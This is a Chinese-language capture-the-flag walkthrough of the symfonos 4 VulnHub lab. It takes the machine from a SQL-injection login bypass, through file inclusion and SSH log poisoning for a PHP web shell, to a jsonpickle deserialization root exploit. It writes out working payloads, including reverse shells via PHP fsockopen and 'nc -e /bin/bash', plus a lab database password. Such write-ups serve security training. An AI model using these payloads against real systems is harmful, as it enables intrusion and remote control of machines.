【攻略鸭】symfonos 4_VulnHub靶机攻略
本文内容纯属虚构,攻略鸭求b站关注点赞支持!
靶机IP地址:192.168.31.215
测试机IP地址:192.168.31.38
外部信息收集
访问http://192.168.31.215/只有一个img图片
端口扫描
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.9p1 Debian 10 (protocol 2.0)
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.38 ((Debian))
网站目录枚举
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.215/FUZZ -e .php,.txt -c
/gods
/atlantis.php
/sea.php
访问http://192.168.31.215/gods/发现三个log文件:hades.log、zeus.log、poseidon.log,分别是三个神话人物介绍
搜索引擎搜返回内容,是执行uptime命令的结果。
访问http://192.168.31.215/atlantis.php有登录框
通过SQLi万能密码登录,响应码302跳转至sea.php,点击hades选项后URL变为:http://192.168.31.215/sea.php?file=hades。内容为hades.log文件的介绍。
测试文件包含漏洞
GET /sea.php?file=../../../../../../etc/passwd
GET /sea.php?file=../../../../../etc/passwd%00
都失败
想到hades.log、zeus.log、poseidon.log都为.log后缀,尝试读取.log文件
GET /sea.php?file=../../../../../var/log/auth
成功返回了SSH日志
ssh '<?php phpinfo(); ?>'@192.168.31.215
GET /sea.php?file=../../../../../var/log/auth
成功返回了phpinfo页面
ssh '<?php system($_GET['cmd']); ?>'@192.168.31.215
GET /sea.php?cmd=id&file=../../../../../var/log/auth
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ nc -nvlp 9000
GET /sea.php?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%22192.168.31.38%22%2C9000%29%3Bexec%28%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27&file=../../../../../var/log/auth
$ python -c 'import pty;pty.spawn("/bin/bash")'
本地信息收集
www-data@MiWiFi-R3600-srv:/var/www/html$ cat atlantis.php
<?php
define('DB_USERNAME', 'root');
define('DB_PASSWORD', 'yVzyRGw3cG2Uyt2r');
$db = new PDO("mysql:host=localhost:3306;dbname=db", DB_USERNAME,DB_PASSWORD);
$statement = $db->prepare("Select * from users where username='".$username."' and pwd='".$pwd."'");
$statement->execute();
www-data@MiWiFi-R3600-srv:/var/www/html$ cat sea.php
cat sea.php
<?php
include("gods/". $_GET['file']. '.log');
?>
www-data@MiWiFi-R3600-srv:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
poseidon:x:1000:1000:,,,:/home/poseidon:/bin/bash
本地开放端口
tcp LISTEN 0 128 127.0.0.1:8080 0.0.0.0:*
Useful software:
/usr/bin/base64
/usr/bin/g++
/usr/bin/gcc
/usr/bin/make
/usr/bin/nc
/usr/bin/nc.traditional
/usr/bin/netcat
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.7
/usr/bin/python3
/usr/bin/python3.7
/usr/bin/socat
/usr/bin/wget
/opt文件夹通常是空的,发现存在/opt/code
www-data@symfonos4:/opt/code$ ls -alh
drwxr-xrwx 4 root root 4.0K Aug 19 2019 .
drwxr-xr-x 3 root root 4.0K Aug 18 2019 ..
-rw-r--r-- 1 root root 942 Aug 19 2019 app.py
-rw-r--r-- 1 root root 1.5K Aug 19 2019 app.pyc
drwxr-xr-x 4 root root 4.0K Aug 19 2019 static
drwxr-xr-x 2 root root 4.0K Aug 19 2019 templates
-rw-r--r-- 1 root root 215 Aug 19 2019 wsgi.pyc
cat app.py
发现jsonpickle
socat转发8080端口
socat TCP-LISTEN:8081,fork TCP:127.0.0.1:8080
访问http://192.168.31.215:8081/whoami
Cookie: PHPSESSID=q7ctie2m9dp9fhv48m82t28204; username=eyJweS9vYmplY3QiOiAiYXBwLlVzZXIiLCAidXNlcm5hbWUiOiAiUG9zZWlkb24ifQ==
username用base64解码为:{"py/object": "app.User", "username": "Poseidon"}
flask-json-pickle漏洞
搜索jsonpickle exploit,找到flask-json-pickle漏洞,exp:
{"py/object": "__main__.Shell", "py/reduce": [{"py/type": "subprocess.Popen"}, {"py/tuple": ["whoami"]}, null, null, null]}
测试机开启监听端口:nc -nvlp 3334
修改系统命令调用方法为os.system,改为:
{"py/object":"main.Shell","py/reduce":[{"py/type":"os.system"},{"py/tuple":["/usr/bin/nc -e /bin/bash 192.168.31.38 3334"]},null,null,null]}
Base64编码后发送,得到shell
id
uid=0(root) gid=0(root) groups=0(root)
其他
flag
# cat /root/proof.txt
Congrats on rooting symfonos:3!
疑问求助
1.flask-json-pickle漏洞的exp中换nc以外的方法都未成功;
2.是否还有其他提权方法?
